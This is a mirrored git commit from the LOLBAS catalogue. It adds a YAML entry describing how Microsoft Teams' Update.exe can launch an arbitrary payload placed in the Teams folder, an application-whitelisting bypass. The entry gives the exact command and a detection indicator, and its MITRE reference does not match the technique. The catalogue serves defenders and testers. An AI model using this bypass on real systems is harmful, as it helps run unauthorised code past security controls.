mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-12 23:11:40 +01:00
Create Teams-update.yml
This commit is contained in:
parent
af19552915
commit
7ed8fb4d06
25
yml/OtherMSBinaries/Teams-update.yml
Normal file
25
yml/OtherMSBinaries/Teams-update.yml
Normal file
@ -0,0 +1,25 @@
|
||||
---
|
||||
Name: Update.exe
|
||||
Description: Update is the squirrel update utility used by Microsoft Electron app (Teams in this case)
|
||||
Author: Mr.Un1k0d3r
|
||||
Created: 2019-06-26
|
||||
Commands:
|
||||
- Command: Copy your payload into `%userprofile%\AppData\Local\Microsoft\Teams\current\`. Then run the following command `%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"`
|
||||
Description: The Update.exe will execute the file you copied into the current folder.
|
||||
Usecase: Application Whitelisting Bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: user privs
|
||||
MitreID: T1033
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Full_Path:
|
||||
- Path: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe
|
||||
|
||||
Detection:
|
||||
- IOC: Update.exe spawned an unknown process
|
||||
Resources:
|
||||
- Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
|
||||
Acknowledgement:
|
||||
- Person: Mr.Un1k0d3r
|
||||
Handle: @MrUn1k0d3r
|
||||
---
|
Loading…
Reference in New Issue
Block a user